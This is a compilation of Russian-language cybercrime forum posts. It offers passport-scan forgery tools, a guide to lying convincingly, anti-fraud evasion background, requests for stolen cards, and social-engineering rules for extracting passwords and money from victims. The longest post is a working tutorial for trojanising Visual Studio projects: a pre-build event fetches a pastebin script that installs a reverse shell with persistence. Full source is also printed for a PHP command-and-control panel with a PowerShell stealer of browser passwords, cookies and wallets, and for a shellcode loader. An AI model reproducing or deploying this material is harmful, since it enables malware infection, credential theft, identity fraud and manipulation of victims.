Сегодня я покажу вам, как с помощью несложных манипуляций можно создать вполне
качественный фейковый скан паспорта и использовать в своих корыстных целях.
RF SCreater
Софт позволяет генерировать отсканированную копию паспорта РФ в разрешении
1625 х 2340, результат можно сохранить в отдельные 2 файла в различных
графических форматах.
Доступно множество функций редактирования и дополнительных опций, требует аппаратное ускорение DirectX. Максимально простой и понятный интерфейс, все операции удобны и интуитивно понятны.
Дополнительно:
[+] Установка не требуется.
[+] Изначально активирована. Если вводить неправильный ключ, то активация
сбрасывается.
Ссылка на скачивание:
https://yadi.sk/d/eTLB8HFI3H2hgd
Ссылка на VT:
https://www.virustotal.com/ru/file/...82df1cd63a2bc4b990fcd7cc20b7939cc59/analysis/
Photoshop
Если же вам хочется более детализированный скан, то без старого доброго
Photoshop не обойтись. Сложного ничего не будет, ибо в psd, который я
прикреплю ниже, уже все настроено и вам остается лишь заполнить текстовые поля
и добавить нужную фотку.
Ссылка на скачивание:
https://yadi.sk/d/z6ctyXIK3VcZYk
P.S. Думаю, как и для чего можно применять такие сканы, объяснять не нужно и каждый задействует их в интересующей его сфере.
Hidden content for authorized users.
1. Примите решение наврать
Взвесьте все за и против и примите окончательное решение, что наврете. И после того, как решение принято, больше в нем не сомневайтесь. Вранье очень легко определить именно из-за внутренних сомнений, которые мучают лгущего. Морально это или аморально? Правильно или неправильно? Честно или нечестно? Уже неважно. Если решили врать, врите.
2. Взвесьте возможность провала
Перед тем как наврать, подумайте, что будет, если выяснится правда, и насколько это вообще вероятно. Если вы врали на эту конкретную тему раньше — и вам верили, — то, возможно, вам удастся провернуть то же самое опять. Ловили ли вас на лжи люди, которым вы планируете наврать? Есть ли свидетели «правды», которые потенциально могли бы подорвать вашу историю? И наконец, что будет, если правда раскроется. Например, если вам десять, подумайте, за что вас накажут сильнее — за двойку или за то, что вы ее скрыли? Если взвесив все обстоятельства, вы все же пришли к выводу, что наврать будет лучше, чем сказать правду, нужно врать.
3. Удостоверьтесь, что вам это выгодно
Очень важно понимать, зачем вы вообще врете. Что вам с этого?
Помните, что чем реже вы врете, чем сильнее ваша репутация «правдивого» человека, тем сильнее вам будут верить.
А это значит, что, если не размениваться на мелкое вранье и сберечь этот «капитал» на тот момент, когда вам это действительно будет нужно, эффект будет сильнее — никто в вас не усомнится. В общем, если врете, врите по-крупному.
4. Прорабатывайте свое вранье
Психолог, доктор Синтия Коэн провела исследование и выяснила то, что мы и без нее знали: попасться на вранье легче всего, когда рассказываешь историю в первый раз. Если хорошенько проработать все детали вранья заранее, чтобы не пришлось ничего придумывать на месте, вероятность успеха возрастает в несколько раз. Вы на эту тему уже кому-то врали — и во второй раз про одно и то же насочиняете намного эффективнее, потому что потренировались.
И более того, в этот раз вы не создаете вранье (используя части мозга, отвечающие за креативные процессы), а вспоминаете его — то есть делаете ровно то же, что бы делали, пересказывая правдивую историю.
5. Говорите правду
Сложнее всего определить вранье, которое не совсем вранье. Чем большее правдивых фактов в вашей истории, тем сложнее будет уличить вас в том, что вы говорите неправду. Также правдивые факты приводят к тому, что слушатель задает меньше вопросов. А чем меньше вопросов, тем меньше вероятность того, что вас рассекретят.
6. Знайте, кому вы врете
Секрет хорошего вруна — он очень эмпатичен. Он отлично видит и чувствует, что творится в голове у того, кому он врет. Разным людям подходит разное вранье. Кому вы собрались наврать? Во что он поверит скорее? Адаптируйте вранье под жертву.
7. Врите коротко
История, которую вы рассказываете, должна быть максимально короткой. Вруны часто проваливаются на том, что начинают рассказывать бесконечные истории с большим количеством подробностей, потому что все это продумали заранее. Продумать вранье важно до мельчайших деталей, но не нужно выдавать их все, пока вас не спросят. Избыток деталей может натолкнуть слушателя на мысли о неправдоподобности, поскольку при пересказе реальной истории зачастую мелкие детали теряются и забываются.
8. Начинайте с вранья
Если нужно кому-то наврать, делайте это сразу. Не начинайте разговор с каких- то других тем, надеясь, что это поможет вам собраться с силами. Не поможет. Первым делом нужно наврать, пока собеседник еще не пригляделся к вам, не привык к вашим жестам и не умеет считывать подтексты в ваших словах. Сначала вранье — потом правда.
Бонус
Вруна часто выдают не слова, а действия. Как выглядеть, чтобы вам поверили?
1. Не отводите глаза, но и не смотрите прямо в зрачки человеку, которому врете. Смотрите на его лицо в целом.
2. Улыбайтесь (ученые утверждают, что, когда люди говорят правду, они чаще улыбаются).
3. Следите за собой — врущий чаще трогает себя за пуговицы, теребит собственную одежду, бессознательно почесывается, совершает другие мелкие нервозные движения.
4. Контролируйте собственный голос. Так как вранье процесс энергоемкий и требующий концентрации слишком большого количества систем организма, голос врущего становится бесцветным и монотонным (у мозга нет дополнительных резервов на то, чтобы бессознательно его контролировать). Поэтому нужно это делать насильно.
Добавьте красок в голос, повышайте и понижайте тональность, изменяйте ритм — старайтесь звучать правдиво, то есть разнообразно, как бы вы это делали, рассказывая интересную правдивую историю. Однако, у некоторых неудачливых лжецов тон голоса слегка повышается или изменяется, повышается и понижается, не сообразно сюжету истории, а как будто сам по себе, что выдает неестественность рассказа. Не переусердствуйте.
5. Размахивайте руками — если вам это вообще свойственно. Врущий часто бессознательно ограничивает движения и мимику. Хотите, чтобы вам верили — не ограничивайте.
Как работают антифрод системы. Часть 1.
До последнего времени самой популярной архитектурой антифрод систем являлась архитектура Fraud score. Архитектура Fraud score получала с помощью браузера пользователя единичные параметры и отпечатки, после чего с помощью логических выражений и статистической базы присваивала каждому полученному параметру или группе параметров удельный вес в рейтинге Risc Score, например:
1. Отличие DNS от страны IP = +7% к Risc Score
2. Отличие DNS от подсети IP = +2% к Risc Score
3. Уникальный отпечаток Canvas = +10% к Risc Score
4. Уникальные параметры шейдеров = +5% к Risc Score
и т.д.
В результате такого анализа пользователь набирал своеобразный "Рейтинг вероятности мошенничества” и, если этот рейтинг был ниже 35%, системы защиты считали все действия пользователя легитимными, при небольшом повышении рейтинга система защиты ограничивала пользователя в правах, а при сильном повышение рейтинга полностью его блокировала. Были свои исключения и особенности, но в целом все работало именно так.
Архитектура Fraud score являлась эффективной до появления продвинутых механизмов антидетекта и позволяла пользователю игнорировать изменения некоторых отпечатков, поэтому очень часто можно было встретить высказывания типа "та я с обычного браузера работаю, чищу куки, вот тот плагин использую и у меня все заходит".
Со временем архитектура Fraud score потеряла эффективность и ей на смену приходит более продвинутая архитектура DGA - Dedicated Group Analysis. На основе данной архитектуры создано большинство современных антифрод систем.
Архитектура DGA использует те же статистические элементы, что и архитектура Fraud score, но логика их обработки кардинально изменена.
Приведем пример:
Представим себе школу в которой есть три класса - 1А, 1Б и 1В.
Мы являемся поваром в данной школе и нам необходимо понять какую пищу и в
каком размере готовить для каждого из классов. Для решения этой задачи мы
воспользуемся данными которые нам предоставили - это будут имена.
1 А класс. Учащиеся:
Игорь, Антон, Саша, Вова, Гена.
1 Б класс. Учащиеся:
Марина, Олег, Аристарх, Сергей, Ольга.
1 В класс. Учащиеся:
Сайфуддин, Юрий, Павел, Илья, Максим.
Для того чтобы понять что готовить каждому классу мы присвоим каждому учащемуся рейтинг от 1 до 9, где 1 самое "русское" имя а 9 самое «иностранное», и в результате получим:
1 А класс. Учащиеся:
Игорь(1), Антон(1), Саша(1), Вова(1), Гена(1)
1 Б класс. Учащиеся:
Марина(1), Олег(1), Евлампий(5), Сергей(1), Ольга(1)
1 В класс. Учащиеся:
Сайфуддин(9), Юрий(1), Павел(1), Илья(1), Максим(1)
После того, как мы присвоили каждому имени рейтинг уникальности, мы составим
общую уникальность класса путем стандартной функции среднего арифметического:
1 А класс. Рейтинг:
(1+1+1+1+1) / 5 = 1
1 Б класс. Рейтинг:
(1+1+5+1+1) / 5 = 1.8
1 В класс. Рейтинг:
(1+1+9+1+1) / 5 = 2.6
Соответственно рейтингу класса мы приготовим:
Для 1 А класса - Пирожки и чай
Для 1 Б класса - Пирог и чай
Для 1 В класса - Эчпочмаки и кумыс
Соответственно делаем вывод, что из-за одного уникального ученика Сайфуддина все остальные учащиеся 1В класса будут страдать, в то время, как Сайфуддин будет сидеть с довольной мордой и пить кумыс.
Далее для каждого класса мы определим размер порции по гендерному признаку, но тут логика понятна и в 1Б классе порции будут меньше всего из-за двух девочек.
Переведя данный пример в разрез антифрод систем мы делаем вывод, что даже когда все наши параметры и отпечатки изменены, но какой-нибудь 1 остается уникальным (например Canvas), наш общий рейтинг Risc Score возрастет до 26% в системах архитектуры DGA, в то время как в системах архитектуры Fraud score он вырос бы всего на 10%.
Ключевой особенностью архитектуры DGA является ужесточение правил для мошенников, при этом не затрагивается деятельность реальных пользователей.
автор: Vektor
Всем привет коллеги,какой по вашему мнению самый лучший шоп где можно приобрести СС?
Всем привет. Кто может поделиться сборкой биржи под скам? Если жалко, то могу и купить. Сделка только через гаранта.
Hidden content for authorized users.
Правило 1 - Никогда не давите на жертву
Некоторые люди, с которыми вы будете иметь дело, не совсем тупые овощи. Они
просто так не сольют тебе пароли или бабки, - Они хотят доверия.
Если не получилось вызвать доверие у жертвы в первой беседе, напишите, что
заняты и перенесите разговор на завтра. Делая это, Вы будете располагать к
себе жертву и вызывать доверие.
Правило 2 - Вы не кормите никого говном
Никогда, никогда и ни за что, не позволяйте жертве даже на секунду задуматься,
что Вы в отчаянии и у вас только 1 клиент. И вообще вы мамкин нищеброд,
который еб** в уши одну жертву в асечки.
Используйте вот это дерьмо: "секундочку", "прошу прощения, буду здесь через
минуту", "извините меня, мне нужно ответить"
Правило 3 - Представьте, что делаете одолжение
Пускай жертва думает, что Вы помогаете ей.
Правило 4 - Сделайте жертву тупой в ее же глазах
"Может помочь с настройкой FTP хоста?" никогда я не говорите, что нужен пароль. Скажите "*** да у тебя root в 667 порту, тебе нужно.. SQL бла бла бла бла" "Ты знаешь как это сделать?"
Правило 5 - Всегда будьте заняты
Если вы только начали общение с рандомным человеком. Всегда, делайте вид, что
вы заняты и вас срочное дело на миллион. Будьте вот таким "Хочу помочь, но я
очень занят сейчас";
"Позвольте мне закончить, тогда я буду в состоянии помочь вам без каких-либо
отвлекающих факторов."
Правило 6 - Разговаривайте
Если у вас сделка, никто не запрещает немножко попиз****. Ну или несите случайную ***ню в другом случае.
Правило 7 - Пишите грамотно
Когда ты сидишь в треде и видишь, как кто-то пишет CAPS LOCK’ом, это
определенно привлекает внимание, не правда ли? Не будь тотальным долб****м, не
допускай ошибок, хотя бы в орфографии,
пиши грамотно и используй подходящий регистр для букв.
Правило 8 - У вас был похожий опыт
Заливайте, что оказывались в подобной ситуации, что и жертва. Это вызовет больше доверия.
Правило 9 - Кажется вы по-настоящему существуете
Иногда это работает, поставьте хотя бы аватар в icq.
Правило 10 - Никогда не раскрывайте себя
Не важно, что ты пытаешься получить или достичь в разговоре с жертвой. Никогда
не подвергайте себя риску, все пишут логи, даже если жертва говорит, как твоя
вылитая мама.
В большинстве случаев, профессиональным подходом будет являться полный обрыв
связи после получения желаемого результата.
Hidden content for authorized users.
](https://anonfile.com/wa8dt5Ydmb)
anonfile.com
Насколько я понял где то в паблике гуляет такой на питоне.
У кого есть такое? Не смог найти.
Что бы воспользоваться данными методами из статьи вам не обязательно нужно быть программистом, или вирусописателем, статья не только носит ознакомительный характер, но и позволит вам конструировать свои решения, или воспользоваться приведёнными в ней.
Не часто, но хотелось бы что бы почаще, вам требуется закинуть полезную нагрузку именно не массово, а для конкретных целей, например получить исходники какого нибудь приложения, подписи или необходимые доступы.
Смоделируем ситуацию, при которой нам необходимо будет прорваться через не глупого пользователя пк, давайте попробуем атаковать программиста. Зачастую программист это не безопасник, и так или иначе исходный код программы ему виден, что ему внушает доверие, этим мы и воспользуемся...
Думаю ни для кого из профессиональных специалистов комментирующих данный тред, не будет удивлением новость о том, что малварь можно распространять через гитхаб, мы все прекрасно читали в новостях, что тут и там появляются трояны, то в репозиториях арчлинукса, в питоновском pypi и еще бог знамо где. Все они вызывают нехилый интерес и по этому попадают в новости, нам же лучше в новости не попадать и по этому мы будем действовать наиболее скрытным образом, например постараемся сделать без файловый лоадер, и загрузить его троянским методом на компьютер жертвы.
Нам нужно построить модель в голове, которая помогала бы нам понять как происходит заражение, нарисуем простую схему, которая будет это иллюстрировать:
Давайте придумаем лоадер который будет загружать дистрибутив портабельного
пайтона, распаковывать его, создавать простейший реверсшелл под сервер которым
будет выступать netcat, в принципе если достаточно хорошо почистить, например
заменив - всеми используемые функции на аналоги - то мы получим нормальную -
тихую сборку, например заменив:
Code:Copy to clipboard
Invoke-Expression $script
на его аналог из С#, что позволит нехило сэкономить нервы при работе с amsi
Code:Copy to clipboard
[powershell]::Create().AddScript($script).Invoke()
И это только только один пример из множества...
Демонстрация работы скрипта по этой схеме:
Так же судя по всему очень набирает обороты тема безфайловой малвари, тут тоже есть чему разгуляться, например установить все тот же портабельный пайтон на машину жертвы и запускать скрипты для питона - из командной строки, как показано в этом видео:
Программиста нужно привлечь его чем-нибудь вкусным, как мотылька на огонёк, так делают многие - например вкусным исходником слитой тулзы... Не мне говорить вам о простой социальной инженерии, но приведу пример - зачастую на тематических телеграм каналах, постятся ссылки на слитые исходники, например движка source, или любого другого приложения (это кстати хорошая платформа для троянов из этой статьи), что может представлять интерес для человека, в нашем же случае не обязательно даже то - что бы исходники вы сами - могли скомпилировать - подойдет в буквальном смысле - любой мусор, главное что бы он выглядел презентабельно, можно конечно попросить человека «за денежку» скомпилировать, никто поверьте не откажется от такой подработки.
Главное в нашем деле начать а потом уже будет ясно, установим крайнею «Visual Studio 2019» с официального сайта Майкрософт, это делается для того что бы захватить как можно большую аудиторию, ведь майки тут и там заставляют качать именно её.
При установке Visual Studio - вам для разнообразия можно установить средства сборки для C# и С++, так мы сможем сделать больший охват нашей аудитории. Устанавливаем как это показано на скриншотах:
Spoiler: Установка VS2019
Скачиваем версию комьюнити - она бесплатна
Ставим галочки как показано на скриншоте для NET и С++ проектов
Отказываемся создавать учетную запись, оно нам нужно?
Создадим новый проект, для примера я выберу С#, под NET, на самом деле вы можете выбрать и С++, пример проекта на плюсах был в прошлом ролике...
После создания проекта, перейдем в его "свойства"
Там во вкладке меню "События сборки" вы можете увидеть такое поле:
В С++ оно будет выглядеть немного по другому, но они по идее равнозначны, выполняют одни и те же функции..
Теперь давайте пройдемся по самому важному - по полезной нагрузке, я приведу небольшой скрипт и расскажу что он делает:
Данная строка скачивает с официального сайта портабельную версию пайтона, у вас это может быть любой экзешник, хоть стиллер, хоть ботнет
Code:Copy to clipboard
Invoke-WebRequest -Uri "https://www.python.org/ftp/python/3.8.3/python-3.8.3-embed-win32.zip" -OutFile $env:ProgramData/python.zip;
Тут происходит разархивация архива в папку
Code:Copy to clipboard
Expand-Archive "$env:ProgramData/python.zip" -DestinationPath "$env:ProgramData/p" -Force;
Потом мы можем создать скрипт в дирректории с питоном, или применить любую другую полезную нагрузку, я например создам скрипт в дирректории, средствами самого пауршелла
Code:Copy to clipboard
Add-Content -Value "import socket`nimport subprocess`nimport time`nimport re`nimport os, sys`nfrom threading import Thread`n`ndef commandThread(command,s):`n`tCMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)`n`ts.send(CMD.stdout.read())`n`ts.send(CMD.stderr.read())`n`nif __name__ == `'__main__`':`n`tspath = os.path.realpath(__file__)`n`tsdir = os.path.dirname(spath)`n`tos.chdir(sdir)`n`twhile True:`n`t`ttry:`n`t`t`ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)`n`t`t`ts.connect(('127.0.0.1', 80))`n`t`t`twhile True:`n`t`t`t`tthread1 = Thread(target=commandThread, args=(s.recv(8192).decode(encoding='ascii'),s))`n`t`t`t`tthread1.start()`n`n`t`texcept Exception as e:`n`t`t`ttime.sleep(3)`n" -Path "$env:ProgramData/p/rs.py";
Добавим получившийся скрипт в автозапуск:
Code:Copy to clipboard
$Runner = "`"{0}`" `"{1}`"" -f "$env:ProgramData\p\pythonw.exe", "$env:ProgramData\p\rs.py";
New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Python" -Value $Runner | Out-Null;
И можете ждать перезапуска компьютера, наш скрипт подключится к неткату и позволит хозяйничать на машине жертвы, вы так же можете переделать его под любые нужны, доустановить в него pip, с помощью скрипта get-pip.py, необходимые вам модули, например для расшифровки паролей из браузеров и многое другое...
А теперь демонстрация того что нужно делать:
А вот код который нужно по итогу вставить на пастебин:
Code:Copy to clipboard
Invoke-WebRequest -Uri "https://www.python.org/ftp/python/3.8.3/python-3.8.3-embed-win32.zip" -OutFile $env:ProgramData/python.zip;Expand-Archive "$env:ProgramData/python.zip" -DestinationPath "$env:ProgramData/p" -Force;Add-Content -Value "import socket`nimport subprocess`nimport time`nimport re`nimport os, sys`nfrom threading import Thread`n`ndef commandThread(command,s):`n`tCMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)`n`ts.send(CMD.stdout.read())`n`ts.send(CMD.stderr.read())`n`nif __name__ == `'__main__`':`n`tspath = os.path.realpath(__file__)`n`tsdir = os.path.dirname(spath)`n`tos.chdir(sdir)`n`twhile True:`n`t`ttry:`n`t`t`ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)`n`t`t`ts.connect(('127.0.0.1', 80))`n`t`t`twhile True:`n`t`t`t`tthread1 = Thread(target=commandThread, args=(s.recv(8192).decode(encoding='ascii'),s))`n`t`t`t`tthread1.start()`n`n`t`texcept Exception as e:`n`t`t`ttime.sleep(3)`n" -Path "$env:ProgramData/p/rs.py";$Runner = "`"{0}`" `"{1}`"" -f "$env:ProgramData\p\pythonw.exe", "$env:ProgramData\p\rs.py";New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Python" -Value $Runner | Out-Null;
И код который выполнит его из сети, который внедряем в проект вижуал студио:
Code:Copy to clipboard
powershell.exe -c $script = Invoke-RestMethod -Uri 'https://pastebin.com/raw/JMy5mnyt' -Method Get;[powershell]::Create().AddScript($script).Invoke();
Вы можете свободно написать тысячи программ и скриптов на пауршелле, этот язык программирования достаточно прост в освоении, он легче чем пайтон или любой взятый, вы можете с легкостью соорудить любой ботнет или стиллер... Тем более он прекрасно совместим с C#. Вы всё так же можете прогружать скрипты из сети и выполнять их в памяти, например вот стиллер для стареньких хромов, оформленный в виде админки на пхп, писалось мной недавно, до эпохальных событий изменений в хроме
PHP:Copy to clipboard
<?php
//заголовок для отображения текста на странице
header("Content-Type: text/plain; charset=utf-8");
ini_set("max_execution_time", 0);
ini_set("upload_max_filesize", "100M");
ini_set("post_max_size", "100M");
function SendRatReq()
{
echo '
$id = $(get-wmiobject Win32_ComputerSystemProduct -computername . | Select-Object -ExpandProperty UUID) -replace "-",":";
$us = $env:UserName;
$os = $env:COMPUTERNAME;
$url = "{0}/?id={1}&us={2}&os={3}" -f $s, $id, $us, $os;
while (1)
{
Start-Sleep -Seconds 5;
$script = Invoke-RestMethod -Uri $url -Method Get;
if($script -gt 0)
{
Invoke-Expression $script;
};
};';
exit;
}
function SendPswdReq()
{
echo '
$PASSWORDARR = @();
$COOKIEARR = @();
$CR_LOGINDATA = "Login Data";
$CR_COOKIES = "Cookies";
$CR_WEBDATA = "Web Data";
$CR_HISTORY = "History";
$CR_FILES = $CR_LOGINDATA, $CR_COOKIES, $CR_WEBDATA, $CR_HISTORY, "recentservers.xml", "sitemanager.xml", "*ftp*.xml", "*ftp*.ini", "accounts.xml", "exodus.wallet", "keystore", "*.wallet", "*let.dat", "*.pem", "map1", "map0", "D877F783D5D3EF8C0", "D877F783D5D3EF8C1", "*.txt", "*.doc", "*.docx", "*.rtf";
$FILEDB_ARR = @(Get-ChildItem -Path "$Env:LOCALAPPDATA", "$Env:APPDATA", "$Env:HOMEPATH/Desktop" -Include $CR_FILES -Recurse -ErrorAction SilentlyContinue);
$FOLDER = "{0}\data" -f "$Env:TEMP";
$FILEZIP = "{0}\arch.zip" -f "$Env:TEMP";
$PASSFILE = "{0}\PASSLOG.txt" -f "$Env:TEMP";
$COOKIES = "{0}\COOKIES.txt" -f "$Env:TEMP";
$SCRSHOT = "{0}\SCREEN.bmp" -f "$Env:TEMP";
New-Item -Path $FOLDER -ItemType Directory;
if ($FILEDB_ARR.Length -gt 0)
{
$sqlite = "{0}/System.Data.SQLite.dll" -f $s;
$interl = "{0}/SQLite.Interop.dll" -f $s;
$SQLitePath = "{0}/System.Data.SQLite.dll" -f "$Env:TEMP";
$SQIntrPath = "{0}/SQLite.Interop.dll" -f "$Env:TEMP";
Invoke-WebRequest -Uri $sqlite -OutFile $SQLitePath;
Invoke-WebRequest -Uri $interl -OutFile $SQIntrPath;
Add-Type -AssemblyName System.Security;
[System.Reflection.Assembly]::LoadFile($SQLitePath) | Out-Null;
foreach ($FILEDB in $FILEDB_ARR)
{
if ($FILEDB.BaseName -eq $CR_LOGINDATA)
{
$DB = "{0}\db{1}" -f "$Env:TEMP", -join ((33..126) | Get-Random -Count 10);
Copy-Item -Path $FILEDB -Destination $DB;
$conn = New-Object System.Data.Sqlite.SqliteConnection -ArgumentList "Data Source=$DB;";
$conn.Open();
$command = New-Object System.Data.SQLite.SQLiteCommand("select signon_realm, username_value, password_value from logins;", $conn);
$reader = $command.ExecuteReader();
while ($reader.Read())
{
$enc = [system.text.encoding]::Default;
$password_value = $enc.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($reader["password_value"], $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser));
$PASSWORDARR += "URL: {0}`nUSR: {1}`nPWD: {2}`n`n" -f $reader["signon_realm"], $reader["username_value"], $password_value;
}
Remove-Item -Path $DB -Force;
} elseif ($FILEDB.BaseName -eq $CR_COOKIES)
{
$DB = "{0}\db{1}" -f "$Env:TEMP", -join ((33..126) | Get-Random -Count 10);
Copy-Item -Path $FILEDB -Destination $DB;
$conn = New-Object System.Data.Sqlite.SqliteConnection -ArgumentList "Data Source=$DB;";
$conn.Open();
$command = New-Object System.Data.SQLite.SQLiteCommand("select host_key, is_httponly, is_secure, name, path, last_access_utc, encrypted_value from cookies;", $conn);
$reader = $command.ExecuteReader();
while ($reader.Read())
{
$enc = [system.text.encoding]::Default;
$encrypted_value = $enc.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($reader["encrypted_value"], $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser));
[string]$is_secure = [bool]$reader["is_secure"];
[string]$is_httponly = [bool]$reader["is_httponly"];
$COOKIEARR += "{0}`t{1}`t{2}`t{3}`t{4}`t{5}`t{6}" -f $reader["host_key"], $is_secure.ToUpper(), $reader["path"], $is_httponly.ToUpper(), $reader["last_access_utc"], $reader["name"], $encrypted_value;
}
Remove-Item -Path $DB -Force;
} else
{
$FILEDS = "{0}\{1}{2}" -f $FOLDER, $FILEDB.BaseName, $FILEDB.Extension;
Copy-Item -Path $FILEDB -Destination $FILEDS;
}
}
Add-Type -AssemblyName System.Windows.Forms
Add-type -AssemblyName System.Drawing;
$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen;
$bitmap = New-Object System.Drawing.Bitmap $Screen.Width, $Screen.Height;
$graphic = [System.Drawing.Graphics]::FromImage($bitmap);
$graphic.CopyFromScreen($Screen.Left, $Screen.Top, 0, 0, $bitmap.Size);
$bitmap.save($SCRSHOT);
$PASSWORDARR | Out-File -Append $PASSFILE;
$COOKIEARR | Out-File -Append $COOKIES;
Compress-Archive -Force -Path $SCRSHOT -DestinationPath $FILEZIP;
Compress-Archive -Update -Path $PASSFILE -DestinationPath $FILEZIP;
Compress-Archive -Update -Path $COOKIES -DestinationPath $FILEZIP;
Compress-Archive -Update -Path $FOLDER -DestinationPath $FILEZIP;
Remove-Item -Path $PASSFILE -Force;
Remove-Item -Path $COOKIES -Force;
Remove-Item -Path $SCRSHOT -Force;
Remove-Item -Path $FOLDER -Recurse -Force;
Remove-Item -Path $SQLitePath -Force;
Remove-Item -Path $SQIntrPath -Force;
$wc = New-Object System.Net.WebClient;
$wc.UploadFile($url, $FILEZIP);
}';
exit;
}
//конфигурация базы данных
$db_host = "localhost";
$db_login = "root";
$db_password = "1234";
$db_database = "databaza";
$db_botable = "clients";
//подключение к базе данных с клиентами
$data = mysqli_connect($db_host, $db_login, $db_password, $db_database);
//если все прошло благополучно
if ($data)
{
//если метод запроса клиента - гет
if ($_SERVER["REQUEST_METHOD"] == "GET")
{
//берем время постукивания клиента
$time = date("d-m-Y").", ".date("h:i:s");
//получаем его гуид, имя юзера, oc, адрес
$run = htmlspecialchars($_REQUEST['run']);
if ($run != NULL)
{
SendRatReq();
}
$uid = htmlspecialchars($_REQUEST['id']);
$username = htmlspecialchars($_REQUEST['us']);
$osverstion = htmlspecialchars($_REQUEST['os']);
$ipaddr = htmlspecialchars($_SERVER["REMOTE_ADDR"]);
//если они не равны нулю
if ($uid != NULL and $username != NULL and $osverstion != NULL)
{
//составляем выражение для поиска уже зареганого клиента
$sql = "SELECT cm FROM clients WHERE id='$uid' AND us='$username' AND os='$osverstion'";
if ($result = mysqli_query($data, $sql))
{
//если клиент есть
if (mysqli_num_rows($result) > 0)
{
while ($row = mysqli_fetch_array($result))
{
//если команда для клиента равна нулю
if ($row['cm'] == NULL)
{
echo "write-host 'hello, d0ct0rW0nd3rta1nm3nt'";
}
else
{
if ($row['cm'] == 'pswd')
{
SendPswdReq();
}
}
}
} //если это первое подключение клиента то добавляем его в базу данных
else
{
//подключаем модуль геолокации
require("geoip.php");
//получаем страну клиента по айпи
$country = ip_code($ipaddr);
//составляем запрос
$sql = "INSERT INTO clients (id, us, os, ip, tm, cm) VALUES ('$uid', '$username', '$osverstion', '$ipaddr', '$time', '')";
//вставляем в таблицу
if (mysqli_query($data, $sql))
{
SendPswdReq();
}
else
{
//echo "ERROR: Could not able to execute $sql. " . mysqli_error($data);
}
}
}
else
{
//echo "ERROR: Could not able to execute $sql. " . mysqli_error($data);
}
}
}
else
{
$uid = htmlspecialchars($_REQUEST['id']);
$username = htmlspecialchars($_REQUEST['us']);
$osverstion = htmlspecialchars($_REQUEST['os']);
if (isset($_FILES['file']['tmp_name']))
{
$fsname = "1.zip";
$file = $_FILES['file']['tmp_name'];
$name = basename($_FILES['file']['name']);
$ext = explode(".", $name);
move_uploaded_file($file, $fsname);
}
}
}
?>
Таким образом мы получаем коннект к машине человека, не обязательно использовать для доставки - бинарники, они зачастую очень сильно ловят детект антивирусами в скантайме и в рантайме, и без сомнения можно сказать, что без цифровой подписи делать теперь нечего, но в тоже время используя только стандартные средства, которые лежат в сети, или на машине жертвы мы можем прорвать глухую оборону там где нас не ждали. Когда то давно люди в шутку и не очень в шутку писали вирусы на batch, это даже можно было назвать искусством... Скоро будет пауршелл и шеллкоды которые будут запускаться в нем, что многие даже используют - просто
пройдитесь по поисковику исследуя пастебин, вы найдете много подобного контента:
Code:Copy to clipboard
Set-StrictMode -Version 2
$DoIt = @'
function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
)
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
return $var_type_builder.CreateType()
}
$var_code = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('ТУТ БЫЛА DLL В BASE64'));
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0x0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@
Для полного понимания картины, просто подумайте о том как много этих самых программистов - еще больше тех кто стремятся ими стать, пара клонов проектов на гитхабе с громкими названиями, множеством звезд-лайков - ничего не будет стоить (так как регистрация там без смс и боли), а в поисковой выдаче гитхаба будет появляться на первых местах, вы сможете легко и быстро начать распространять все что угодно, на аудиторию по всему миру, зачастую аудитория не из бедных, и попадаются вкусные ништяки, например теже доступы к сеткам (незабываем про удаленку), ключи и множество полезных данных. И это только самый примитивный способ доступный множеству людей.
